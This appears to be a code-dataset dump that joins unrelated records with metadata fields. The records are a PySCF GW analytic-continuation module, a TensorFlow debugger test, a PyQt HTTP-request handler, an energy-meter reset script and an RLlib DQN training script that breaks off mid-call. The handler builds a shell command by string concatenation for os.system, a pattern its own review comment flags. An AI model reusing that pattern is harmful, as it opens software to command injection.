    The first frequency point's residual is scaled by 1/0.01 (100x weight).
    """
    cf = coeff[:5] + 1j * coeff[5:]
    model = cf[0] + cf[1] / (omega + cf[3]) + cf[2] / (omega + cf[4])
    resid = model - sigma
    resid[0] = resid[0] / 0.01
    return np.concatenate([resid.real, resid.imag])
def two_pole(freqs, coeff):
    """Evaluate the two-pole model at freqs from packed real coefficients."""
    cf = coeff[:5] + 1j * coeff[5:]
    pole1 = cf[1] / (freqs + cf[3])
    pole2 = cf[2] / (freqs + cf[4])
    return cf[0] + pole1 + pole2
def AC_twopole_diag(sigma, omega, orbs, nocc):
    """
    Analytic continuation to real axis using a two-pole model.

    Args:
        sigma : (norbs, nw) complex self-energy on the imaginary axis.
        omega : (norbs, nw) imaginary-frequency grid per orbital.
        orbs : orbital indices corresponding to the rows of sigma.
        nocc : number of occupied orbitals (selects the initial guess).

    Returns:
        coeff: 2D array (ncoeff, norbs); 5 complex two-pole parameters
        per orbital packed as [5 real parts, 5 imag parts].
    """
    norbs, nw = sigma.shape
    coeff = np.zeros((10, norbs))
    for p in range(norbs):
        # mirrored initial pole positions for occupied vs virtual orbitals
        if orbs[p] < nocc:
            x0 = np.array([0, 1, 1, 1, -1, 0, 0, 0, -1.0, -0.5])
        else:
            x0 = np.array([0, 1, 1, 1, -1, 0, 0, 0, 1.0, 0.5])
        #TODO: analytic gradient
        xopt = least_squares(two_pole_fit, x0, jac='3-point', method='trf', xtol=1e-10,
                             gtol=1e-10, max_nfev=1000, verbose=0, args=(omega[p], sigma[p]))
        # 'not success' instead of 'is False': robust to non-bool flags
        if not xopt.success:
            print('WARN: 2P-Fit Orb %d not converged, cost function %e'%(p, xopt.cost))
        coeff[:, p] = xopt.x.copy()
    return coeff
def thiele(fn, zn):
    """Thiele reciprocal-difference coefficients for a Pade continued fraction.

    Builds the triangular table of reciprocal differences of the samples
    fn at points zn and returns its diagonal (the CF coefficients).
    """
    npts = len(zn)
    table = np.zeros((npts, npts), dtype=np.complex128)
    table[:, 0] = fn.copy()
    for col in range(1, npts):
        prev = table[col:, col - 1]
        table[col:, col] = (table[col - 1, col - 1] - prev) / ((zn[col:] - zn[col - 1]) * prev)
    return table.diagonal()
def pade_thiele(freqs, zn, coeff):
    """Evaluate the Thiele continued fraction with coefficients coeff
    (from thiele()) at freqs, using reference points zn."""
    ncoef = len(coeff)
    # seed with the innermost term, then fold the fraction outwards
    acc = coeff[-1] * (freqs - zn[-2])
    for level in range(ncoef - 1, 0, -1):
        acc = coeff[level] * (freqs - zn[level - 1]) / (1. + acc)
    return coeff[0] / (1. + acc)
def AC_pade_thiele_diag(sigma, omega):
    """
    Analytic continuation to real axis using a Pade approximation
    from Thiele's reciprocal difference method.
    Reference: Vidberg and Serene, J. Low Temp. Phys. 29, 179 (1977)
    Returns:
        coeff: 2D array (ncoeff, norbs)
        omega: 2D array (norbs, npade)
    """
    # subsample the imaginary-frequency grid: dense at low freq, sparse tail
    picked = range(1, 40, 6)
    tail_start = picked[-1] + 4
    sigma = np.hstack((sigma[:, picked], sigma[:, tail_start::4]))
    omega = np.hstack((omega[:, picked], omega[:, tail_start::4]))
    norbs, nfreq = sigma.shape
    npade = nfreq // 2
    coeff = np.zeros((npade * 2, norbs), dtype=np.complex128)
    for p in range(norbs):
        coeff[:, p] = thiele(sigma[p, :npade * 2], omega[p, :npade * 2])
    return coeff, omega[:, :npade * 2]
class KRGWAC(lib.StreamObject):
    """Spin-restricted G0W0 quasiparticle calculation with k-point sampling,
    using analytic continuation (AC) of the self-energy from the imaginary
    to the real frequency axis.  Gaussian density fitting (GDF) integrals
    are required.
    """
    linearized = getattr(__config__, 'gw_gw_GW_linearized', False)
    # Analytic continuation: pade or twopole
    ac = getattr(__config__, 'gw_gw_GW_ac', 'pade')
    # Whether applying finite size corrections
    fc = getattr(__config__, 'gw_gw_GW_fc', True)

    def __init__(self, mf, frozen=0):
        # mf: a periodic mean-field object (e.g. KRKS) carrying GDF
        # integrals in mf.with_df.
        self.mol = mf.mol
        self._scf = mf
        self.verbose = self.mol.verbose
        self.stdout = self.mol.stdout
        self.max_memory = mf.max_memory
        #TODO: implement frozen orbs
        if frozen > 0:
            raise NotImplementedError
        self.frozen = frozen
        # DF-KGW must use GDF integrals
        if getattr(mf, 'with_df', None):
            self.with_df = mf.with_df
        else:
            raise NotImplementedError
        # NOTE(review): self._keys is not assigned until the end of
        # __init__, so this update relies on a `_keys` attribute provided
        # by lib.StreamObject, and its effect is superseded by the
        # reassignment of self._keys below -- confirm.
        self._keys.update(['with_df'])
        ##################################################
        # don't modify the following attributes, they are not input options
        self._nocc = None
        self._nmo = None
        self.kpts = mf.kpts
        self.nkpts = len(self.kpts)
        # self.mo_energy: GW quasiparticle energy, not scf mo_energy
        self.mo_energy = None
        self.mo_coeff = mf.mo_coeff
        self.mo_occ = mf.mo_occ
        self.sigma = None
        keys = set(('linearized','ac','fc'))
        self._keys = set(self.__dict__.keys()).union(keys)

    def dump_flags(self):
        """Log a summary of the calculation setup and return self."""
        log = logger.Logger(self.stdout, self.verbose)
        log.info('')
        log.info('******** %s ********', self.__class__)
        log.info('method = %s', self.__class__.__name__)
        nocc = self.nocc
        nvir = self.nmo - nocc
        nkpts = self.nkpts
        log.info('GW nocc = %d, nvir = %d, nkpts = %d', nocc, nvir, nkpts)
        # NOTE(review): frozen defaults to 0 (not None), so this branch is
        # always taken -- confirm whether `is not None` is intended.
        if self.frozen is not None:
            log.info('frozen orbitals %s', str(self.frozen))
        logger.info(self, 'use perturbative linearized QP eqn = %s', self.linearized)
        logger.info(self, 'analytic continuation method = %s', self.ac)
        logger.info(self, 'GW finite size corrections = %s', self.fc)
        return self

    @property
    def nocc(self):
        # Number of occupied orbitals; delegates to the bound helper below.
        return self.get_nocc()
    @nocc.setter
    def nocc(self, n):
        self._nocc = n

    @property
    def nmo(self):
        # Total number of molecular orbitals; delegates to the bound helper.
        return self.get_nmo()
    @nmo.setter
    def nmo(self, n):
        self._nmo = n

    # Bind the module-level orbital-counting helpers as methods.
    get_nocc = get_nocc
    get_nmo = get_nmo
    get_frozen_mask = get_frozen_mask

    def kernel(self, mo_energy=None, mo_coeff=None, orbs=None, kptlist=None, nw=100):
        """
        Input:
            kptlist: self-energy k-points
            orbs: self-energy orbs
            nw: grid number
        Output:
            mo_energy: GW quasiparticle energy
        """
        if mo_coeff is None:
            mo_coeff = np.array(self._scf.mo_coeff)
        if mo_energy is None:
            mo_energy = np.array(self._scf.mo_energy)

        nmo = self.nmo
        naux = self.with_df.get_naoaux()
        nkpts = self.nkpts
        # Rough in-core memory estimate in MB: 2 * nkpts * nmo^2 * naux
        # complex128 (16-byte) elements.
        mem_incore = (2*nkpts*nmo**2*naux) * 16/1e6
        mem_now = lib.current_memory()[0]
        if (mem_incore + mem_now > 0.99*self.max_memory):
            logger.warn(self, 'Memory may not be enough!')
            raise NotImplementedError

        # NOTE(review): time.clock() was removed in Python 3.8; consider
        # time.process_time() here.
        cput0 = (time.clock(), time.time())
        self.dump_flags()
        # Delegates the actual GW-AC computation to the module-level kernel.
        self.converged, self.mo_energy, self.mo_coeff = \
                kernel(self, mo_energy, mo_coeff, orbs=orbs,
                       kptlist=kptlist, nw=nw, verbose=self.verbose)

        logger.warn(self, 'GW QP energies may not be sorted from min to max')
        logger.timer(self, 'GW', *cput0)
        return self.mo_energy
if __name__ == '__main__':
    # Regression test: G0W0-AC on diamond with a 3x1x1 k-mesh, with and
    # without finite-size corrections.
    from pyscf.pbc import gto, dft, scf
    from pyscf.pbc.lib import chkfile
    import os
    # This test takes a few minutes
    cell = gto.Cell()
    cell.build(unit = 'angstrom',
            a = '''
            0.000000 1.783500 1.783500
            1.783500 0.000000 1.783500
            1.783500 1.783500 0.000000
            ''',
            atom = 'C 1.337625 1.337625 1.337625; C 2.229375 2.229375 2.229375',
            dimension = 3,
            max_memory = 8000,
            verbose = 4,
            pseudo = 'gth-pade',
            basis='gth-szv',
            precision=1e-10)
    kpts = cell.make_kpts([3,1,1],scaled_center=[0,0,0])
    # NOTE(review): `df` is not imported in this block; it must come from a
    # module-level `from pyscf.pbc import df` not visible here -- confirm.
    gdf = df.GDF(cell, kpts)
    gdf_fname = 'gdf_ints_311.h5'
    gdf._cderi_to_save = gdf_fname
    # Build the density-fitting integrals only once; reuse the HDF5 file.
    if not os.path.isfile(gdf_fname):
        gdf.build()
    chkfname = 'diamond_311.chk'
    if os.path.isfile(chkfname):
        # Reuse a previously converged SCF from the checkpoint file.
        kmf = dft.KRKS(cell, kpts)
        kmf.xc = 'pbe'
        kmf.with_df = gdf
        kmf.with_df._cderi = gdf_fname
        data = chkfile.load(chkfname, 'scf')
        kmf.__dict__.update(data)
    else:
        # Run the SCF from scratch and checkpoint it.
        kmf = dft.KRKS(cell, kpts)
        kmf.xc = 'pbe'
        kmf.with_df = gdf
        kmf.with_df._cderi = gdf_fname
        kmf.conv_tol = 1e-12
        kmf.chkfile = chkfname
        kmf.kernel()
    gw = KRGWAC(kmf)
    gw.linearized = False
    gw.ac = 'pade'
    # without finite size corrections
    gw.fc = False
    nocc = gw.nocc
    gw.kernel(kptlist=[0,1,2],orbs=range(0,nocc+3))
    print(gw.mo_energy)
    assert((abs(gw.mo_energy[0][nocc-1]-0.62045797))<1e-5)
    assert((abs(gw.mo_energy[0][nocc]-0.96574324))<1e-5)
    assert((abs(gw.mo_energy[1][nocc-1]-0.52639137))<1e-5)
    assert((abs(gw.mo_energy[1][nocc]-1.07513258))<1e-5)
    # with finite size corrections
    gw.fc = True
    gw.kernel(kptlist=[0,1,2],orbs=range(0,nocc+3))
    print(gw.mo_energy)
    assert((abs(gw.mo_energy[0][nocc-1]-0.54277092))<1e-5)
    assert((abs(gw.mo_energy[0][nocc]-0.80148537))<1e-5)
    assert((abs(gw.mo_energy[1][nocc-1]-0.45073793))<1e-5)
    assert((abs(gw.mo_energy[1][nocc]-0.92910108))<1e-5)
|
en
| 0.750797
|
#!/usr/bin/env python # Copyright 2014-2020 The PySCF Developers. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Author: <NAME> <<EMAIL>> # PBC spin-restricted G0W0-AC QP eigenvalues with k-point sampling This implementation has N^4 scaling, and is faster than GW-CD (N^4) and analytic GW (N^6) methods. GW-AC is recommended for valence states only, and is inaccuarate for core states. Method: See <NAME> and <NAME>, arxiv:2007.03148 (2020) for details Compute Sigma on imaginary frequency with density fitting, then analytically continued to real frequency. Gaussian density fitting must be used (FFTDF and MDF are not supported). 
GW-corrected quasiparticle orbital energies Returns: A list : converged, mo_energy, mo_coeff # v_xc # v_hf from DFT/HF density # Grids for integration on imaginary axis # Compute self-energy on imaginary axis i*[0,iw_cutoff] # Analytic continuation # This code does not support metals # linearized G0W0 #TODO: analytic sigma derivative # self-consistently solve QP equation Compute density response function in auxiliary basis at freq iw # Compute Pi for kL # Find ka that conserves with ki and kL (-ki+ka+kL=G) # Response from both spin-up and spin-down density Compute GW correlation self-energy (diagonal elements) in MO basis on imaginary axis # possible kpts shift center # This code does not support metals # Integration on numerical grids # Compute occ for -iw and vir for iw separately # to avoid branch cuts in analytic continuation # Set up q mesh for q->0 finite size correction # Get qij = 1/sqrt(Omega) * < psi_{ik} | e^{iqr} | psi_{ak-q} > at q: (nkpts, nocc, nvir) # Lij: (ki, L, i, j) for looping every kL # kidx: save kj that conserves with kL and ki (-ki+kj+kL=G) # kidx_r: save ki that conserves with kL and kj (-ki+kj+kL=G) # Find (ki,kj) that satisfies momentum conservation with kL # Read (L|pq) and ao2mo transform to (L|ij) # support uneqaul naux on different k points # body dielectric matrix eps_body # head dielectric matrix eps_00 # wings dielectric matrix eps_P0 # inverse dielectric matrix # head correction # Find km that conserves with kn and kL (-km+kn+kL=G) # apply head correction # apply wing correction # Find km that conserves with kn and kL (-km+kn+kL=G) Compute head (G=0, G'=0) density response function in auxiliary basis at freq iw # Compute Pi head Compute wing (G=P, G'=0) density response function in auxiliary basis at freq iw # Compute Pi wing Compute qij = 1/Omega * |< psi_{ik} | e^{iqr} | psi_{ak-q} >|^2 at q: (nkpts, nocc, nvir) through kp perturbtation theory Ref: Phys. Rev. 
B 83, 245122 (2011) Scale nw Legendre roots, which lie in the interval [-1, 1], so that they lie in [0, inf) Ref: www.cond-mat.de/events/correl19/manuscripts/ren.pdf Returns: freqs : 1D ndarray wts : 1D ndarray Clenshaw-Curtis qaudrature on [0,inf) Ref: J. Chem. Phys. 132, 234114 (2010) Returns: freqs : 1D ndarray wts : 1D ndarray Analytic continuation to real axis using a two-pole model Returns: coeff: 2D array (ncoeff, norbs) #TODO: analytic gradient Analytic continuation to real axis using a Pade approximation from Thiele's reciprocal difference method Reference: <NAME>. Phys. 29, 179 (1977) Returns: coeff: 2D array (ncoeff, norbs) omega: 2D array (norbs, npade) # Analytic continuation: pade or twopole # Whether applying finite size corrections #TODO: implement frozen orbs # DF-KGW must use GDF integrals ################################################## # don't modify the following attributes, they are not input options # self.mo_energy: GW quasiparticle energy, not scf mo_energy Input: kptlist: self-energy k-points orbs: self-energy orbs nw: grid number Output: mo_energy: GW quasiparticle energy # This test takes a few minutes 0.000000 1.783500 1.783500 1.783500 0.000000 1.783500 1.783500 1.783500 0.000000 # without finite size corrections # with finite size corrections
| 1.675714
| 2
|
tensorflow/python/debug/lib/debug_grappler_test.py
|
abhaikollara/tensorflow
| 1
|
6628091
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for debugger functionalities in tf.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
def _grappler_enabled_session_config():
  """Constructs a Session config proto that explicitly enables Grappler.
  Returns:
    A config proto that obtains extra safety for the unit tests in this
    file by ensuring that the relevant Grappler rewrites are always enabled.
  """
  rewrites = rewriter_config_pb2.RewriterConfig(
      disable_model_pruning=False,
      arithmetic_optimization=rewriter_config_pb2.RewriterConfig.ON)
  return config_pb2.ConfigProto(
      graph_options=config_pb2.GraphOptions(rewrite_options=rewrites))
class SessionDebugGrapplerInteractionTest(test_util.TensorFlowTestCase):
  """Checks that tfdbg can observe graphs after Grappler rewrites them."""

  def setUp(self):
    super(SessionDebugGrapplerInteractionTest, self).setUp()
    # Each test dumps its debug tensors into a fresh temporary directory.
    self._dump_root = tempfile.mkdtemp()
    self._debug_url = "file://%s" % self._dump_root

  def tearDown(self):
    # Reset graph state and remove the dump directory between tests.
    ops.reset_default_graph()
    if os.path.isdir(self._dump_root):
      file_io.delete_recursively(self._dump_root)
    super(SessionDebugGrapplerInteractionTest, self).tearDown()

  def testArithmeticOptimizationActive(self):
    """Tests that tfdbg can dump the tensor from nodes created by Grappler."""
    with session.Session(config=_grappler_enabled_session_config()) as sess:
      u = variables.VariableV1([[1, 2], [3, 4]], name="u", dtype=dtypes.float32)
      # The next two ops should be optimized by Grappler into a single op:
      # either an AddN op or a Mul op.
      x = math_ops.add(u, u)
      x = math_ops.add(x, u)
      y = math_ops.multiply(x, u)
      sess.run(variables.global_variables_initializer())
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      # Watch every node in the graph with DebugIdentity, dumping to disk.
      debug_utils.watch_graph(
          run_options,
          sess.graph,
          debug_ops=["DebugIdentity"],
          debug_urls=[self._debug_url])
      run_metadata = config_pb2.RunMetadata()
      run_result = sess.run(y, options=run_options, run_metadata=run_metadata)
      # y = (u + u + u) * u.
      self.assertAllClose(run_result, [[3, 12], [27, 48]])
      dump_data = debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs,
          validate=True)
      original_node_names = set([op.name for op in sess.graph.get_operations()])
      dumped_node_names = set(dump_data.nodes())
      grappler_created_node_names = dumped_node_names - original_node_names
      grappler_removed_node_names = original_node_names - dumped_node_names
      # Assert that Grappler should have replaced some of the nodes from the
      # original graph with new nodes.
      self.assertTrue(grappler_created_node_names)
      self.assertTrue(grappler_removed_node_names)
      # Iterate through the nodes created by Grappler. One of them should be
      # be the result of replacing the original add ops with an AddN op or a
      # Mul op.
      found_optimized_node = False
      for grappler_node_name in grappler_created_node_names:
        node_op_type = dump_data.node_op_type(grappler_node_name)
        # Look for the node created by Grappler's arithmetic optimization.
        if node_op_type in ("AddN", "Mul"):
          datum = dump_data.get_tensors(grappler_node_name, 0, "DebugIdentity")
          self.assertEqual(1, len(datum))
          # The optimized node computes u + u + u = 3u.
          self.assertAllClose(datum[0], [[3, 6], [9, 12]])
          found_optimized_node = True
          break
      self.assertTrue(
          found_optimized_node,
          "Failed to find optimized node created by Grappler's arithmetic "
          "optimization.")
if __name__ == "__main__":
  # Run all test cases in this module via the TF test runner.
  googletest.main()
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for debugger functionalities in tf.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
def _grappler_enabled_session_config():
"""Constructs a Session config proto that explicitly enables Grappler.
Returns:
A config proto that obtains extra safety for the unit tests in this
file by ensuring that the relevant Grappler rewrites are always enabled.
"""
rewriter_config = rewriter_config_pb2.RewriterConfig(
disable_model_pruning=False,
arithmetic_optimization=rewriter_config_pb2.RewriterConfig.ON)
graph_options = config_pb2.GraphOptions(rewrite_options=rewriter_config)
return config_pb2.ConfigProto(graph_options=graph_options)
class SessionDebugGrapplerInteractionTest(test_util.TensorFlowTestCase):
def setUp(self):
super(SessionDebugGrapplerInteractionTest, self).setUp()
self._dump_root = tempfile.mkdtemp()
self._debug_url = "file://%s" % self._dump_root
def tearDown(self):
ops.reset_default_graph()
if os.path.isdir(self._dump_root):
file_io.delete_recursively(self._dump_root)
super(SessionDebugGrapplerInteractionTest, self).tearDown()
def testArithmeticOptimizationActive(self):
"""Tests that tfdbg can dump the tensor from nodes created by Grappler."""
with session.Session(config=_grappler_enabled_session_config()) as sess:
u = variables.VariableV1([[1, 2], [3, 4]], name="u", dtype=dtypes.float32)
# The next two ops should be optimized by Grappler into a single op:
# either an AddN op or a Mul op.
x = math_ops.add(u, u)
x = math_ops.add(x, u)
y = math_ops.multiply(x, u)
sess.run(variables.global_variables_initializer())
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugIdentity"],
debug_urls=[self._debug_url])
run_metadata = config_pb2.RunMetadata()
run_result = sess.run(y, options=run_options, run_metadata=run_metadata)
self.assertAllClose(run_result, [[3, 12], [27, 48]])
dump_data = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs,
validate=True)
original_node_names = set([op.name for op in sess.graph.get_operations()])
dumped_node_names = set(dump_data.nodes())
grappler_created_node_names = dumped_node_names - original_node_names
grappler_removed_node_names = original_node_names - dumped_node_names
# Assert that Grappler should have replaced some of the nodes from the
# original graph with new nodes.
self.assertTrue(grappler_created_node_names)
self.assertTrue(grappler_removed_node_names)
# Iterate through the nodes created by Grappler. One of them should be
# be the result of replacing the original add ops with an AddN op or a
# Mul op.
found_optimized_node = False
for grappler_node_name in grappler_created_node_names:
node_op_type = dump_data.node_op_type(grappler_node_name)
# Look for the node created by Grappler's arithmetic optimization.
if node_op_type in ("AddN", "Mul"):
datum = dump_data.get_tensors(grappler_node_name, 0, "DebugIdentity")
self.assertEqual(1, len(datum))
self.assertAllClose(datum[0], [[3, 6], [9, 12]])
found_optimized_node = True
break
self.assertTrue(
found_optimized_node,
"Failed to find optimized node created by Grappler's arithmetic "
"optimization.")
if __name__ == "__main__":
googletest.main()
|
en
| 0.861092
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== Tests for debugger functionalities in tf.Session. Constructs a Session config proto that explicitly enables Grappler. Returns: A config proto that obtains extra safety for the unit tests in this file by ensuring that the relevant Grappler rewrites are always enabled. Tests that tfdbg can dump the tensor from nodes created by Grappler. # The next two ops should be optimized by Grappler into a single op: # either an AddN op or a Mul op. # Assert that Grappler should have replaced some of the nodes from the # original graph with new nodes. # Iterate through the nodes created by Grappler. One of them should be # be the result of replacing the original add ops with an AddN op or a # Mul op. # Look for the node created by Grappler's arithmetic optimization.
| 1.652986
| 2
|
event.py
|
akakou-hobby/tcp-client-chan
| 0
|
6628092
|
''' page/request/control.py
イベントがあった時にこっちに飛ばされる。
'''
import os
import configparser
from lib.http_client import http_client
class Event():
    """Handles UI events from the request page (page/request/control.py).

    Events raised by the view are dispatched to this class.
    """

    def __init__(self, view):
        """Keep a reference to the View instance that raises events."""
        self.view = view

    def button_clicked(self):
        """Handle a click on the request button.

        Builds an HTTP request from the UI fields, sends it, saves the
        response to a numbered HTML file, and opens it in the configured
        text editor.
        """
        ### Collect the values held by the UI widgets
        edit_text_plain = self.view.text_edit.toPlainText()
        line_edit_plain = self.view.line_edit.text()

        ### Build the request ("host:port" comes from the line edit)
        line_text_split = line_edit_plain.split(':')
        request = {
            'host': line_text_split[0],
            'port': int(line_text_split[1]),
            'header': edit_text_plain,
            'encode': 'utf-8'
        }

        ### Communicate
        client = http_client.LowLayerHTTPClient(request=request)
        client.connect()
        client.send()
        # Return value unused; the response is read from client.response below.
        client.get_response()
        client.close()
        print(client.response['all'])

        ### Read the configuration file
        # Fix: SafeConfigParser was deprecated since 3.2 and removed in
        # Python 3.12; ConfigParser is the drop-in replacement.
        inifile = configparser.ConfigParser()
        inifile.read('config.ini')
        editor = inifile.get('General', 'text_editer')
        count = int(inifile.get('General', 'count')) + 1
        inifile.set('General', 'count', str(count))
        # Fix: persist the incremented counter -- the original never wrote
        # the config back, so the counter never changed between runs.
        with open('config.ini', 'w') as cfg:
            inifile.write(cfg)

        ### Save the response to a file (with-block guarantees the close)
        with open(str(count) + '.html', 'w') as f:
            f.write(client.response['all'])

        ### Launch the text editor
        # NOTE(review): os.system with an interpolated string is vulnerable
        # to shell injection if `text_editer` is attacker-controlled;
        # consider subprocess.run([editor, filename]).
        os.system(editor + ' ' + str(count) + '.html')

        ### Done
        exit()
|
''' page/request/control.py
イベントがあった時にこっちに飛ばされる。
'''
import os
import configparser
from lib.http_client import http_client
class Event():
def __init__(self, view):
'''Viewのインスタンスを取ってくる'''
self.view = view
def button_clicked(self):
'''リクエストボタンが押されたとき'''
### 各UIの持ってる値を持ってくる
edit_text_plain = self.view.text_edit.toPlainText()
line_edit_plain = self.view.line_edit.text()
### レスポンス作成
line_text_split = line_edit_plain.split(':')
request = {
'host': line_text_split[0],
'port': int(line_text_split[1]),
'header': edit_text_plain,
'encode': 'utf-8'
}
### 通信
client = http_client.LowLayerHTTPClient(request=request)
client.connect()
client.send()
response = client.get_response()
client.close()
print(client.response['all'])
### 設定ファイルの読み込み
inifile = configparser.SafeConfigParser()
inifile.read('config.ini')
editor = inifile.get('General', 'text_editer')
count = inifile.get('General', 'count')
count = int(count)
count += 1
inifile.set('General', 'count', str(count))
### ファイル保存
f = open(str(count) + '.html', 'w')
f.write(client.response['all'])
f.close()
### メモ帳の起動
os.system(editor + ' ' + str(count) + '.html')
### 終了
exit()
|
ja
| 1.000007
|
page/request/control.py イベントがあった時にこっちに飛ばされる。 Viewのインスタンスを取ってくる リクエストボタンが押されたとき ### 各UIの持ってる値を持ってくる ### レスポンス作成 ### 通信 ### 設定ファイルの読み込み ### ファイル保存 ### メモ帳の起動 ### 終了
| 2.723455
| 3
|
examples/set_zeroreset.py
|
MasterSpecter/ekmmeters
| 9
|
6628093
|
""" Simple example zero reset
(c) 2016 EKM Metering.
"""
from ekmmeters import *
# Serial port and meter under test.
my_port_name = "/dev/ttyO4"
my_meter_address = "000300001463"

# Route library logging to the console.
ekm_set_log(ekm_print_log)

# Open the port and attach the meter to it.
port = SerialPort(my_port_name)
# Fix: idiomatic truthiness test instead of comparing `== True`.
if port.initPort():
    my_meter = V4Meter(my_meter_address)
    my_meter.attachPort(port)
else:
    # No port, no meter.
    print("Cannot open port")
    exit()

# Zero the resettable kWh counters, then read the new values back.
if my_meter.setZeroResettableKWH():
    if my_meter.request():
        print(my_meter.getField(Field.Resettable_Rev_kWh_Tot))
        print(my_meter.getField(Field.Resettable_kWh_Tot))

port.closePort()
|
""" Simple example zero reset
(c) 2016 EKM Metering.
"""
from ekmmeters import *
#port and meter
my_port_name = "/dev/ttyO4"
my_meter_address = "000300001463"
#logging to console
ekm_set_log(ekm_print_log)
#open port and init
port = SerialPort(my_port_name)
if (port.initPort() == True):
my_meter = V4Meter(my_meter_address)
my_meter.attachPort(port)
else:
# no port no meter
print("Cannot open port")
exit()
if my_meter.setZeroResettableKWH():
if my_meter.request():
print(my_meter.getField(Field.Resettable_Rev_kWh_Tot))
print(my_meter.getField(Field.Resettable_kWh_Tot))
port.closePort()
|
en
| 0.474745
|
Simple example zero reset (c) 2016 EKM Metering. #port and meter #logging to console #open port and init # no port no meter
| 2.714043
| 3
|
dqn.py
|
JiekaiJia/pettingzoo_comunication
| 1
|
6628094
|
""""""
from copy import deepcopy
import os
from pettingzoo.mpe import (
simple_crypto_v2,
simple_reference_v2,
simple_speaker_listener_v3,
simple_spread_v2,
simple_tag_v2,
simple_world_comm_v2,
)
import ray
from ray.rllib.agents.registry import get_trainer_class
from ray import tune
from ray.tune.registry import register_env
from utils import parallel_env, parallel_comm_env, main_comm_env, main_env
if __name__ == '__main__':
    # Train a shared-nothing multi-agent DQN on a PettingZoo MPE task
    # with RLlib/Tune, one policy per agent.
    # Create test environment.
    test_env = main_env(simple_speaker_listener_v3)()
    # Register env
    # NOTE(review): the registered name 'simple_spread' does not match the
    # wrapped environment (simple_speaker_listener_v3) -- confirm intent.
    register_env('simple_spread', lambda _: main_env(simple_speaker_listener_v3)())
    # The used algorithm
    alg_name = 'DQN'
    # Gets default training configuration.
    config = deepcopy(get_trainer_class(alg_name)._default_config)
    # === Settings for Rollout Worker processes ===
    # Use GPUs if `RLLIB_NUM_GPUS` env var set to > 0.
    config['num_gpus'] = int(os.environ.get('RLLIB_NUM_GPUS', '0'))
    # Number of rollout worker actors to create for parallel sampling.
    config['num_workers'] = 1
    config['num_envs_per_worker'] = 4
    config['render_env'] = True
    # === Settings for the Trainer process ===
    # Whether layers should be shared for the value function.
    config['model'] = {
        # 'fcnet_hiddens': [128],
        'fcnet_activation': 'relu',
    }
    # === Environment Settings ===
    config['env'] = 'simple_spread'
    # the env_creator function via the register env lambda below.
    # config['env_config'] = {'max_cycles': max_cycles, 'num_agents': num_agents, 'local_ratio': local_ratio}
    # # === Debug Settings ===
    # # Periodically print out summaries of relevant internal dataflow(DEBUG, INFO, WARN, or ERROR.)
    config['log_level'] = 'DEBUG'
    # === Settings for Multi-Agent Environments ===
    # Configuration for multi-agent setup with policy sharing:
    config['multiagent'] = {
        # Map of type MultiAgentPolicyConfigDict from policy ids to tuples
        # of (policy_cls, obs_space, act_space, config). This defines the
        # observation and action spaces of the policies and any extra config.
        'policies': {
            f'{agent}': (None, test_env.observation_spaces[agent], test_env.action_spaces[agent], {}) for agent in test_env.agents
        },
        # Function mapping agent ids to policy ids.
        'policy_mapping_fn': lambda agent_id: f'{agent_id}',
    }
    # Initialize ray and trainer object
    ray.init(
        ignore_reinit_error=True,
        # log_to_driver=False
    )
    # Stop criteria
    stop = {
        # "episode_reward_mean": -115,
        "training_iteration": 700,
    }
    # Train
    results = tune.run(
        alg_name,
        stop=stop,
        config=config,
        checkpoint_at_end=True,
        checkpoint_freq=1,
        local_dir='./ray_results',
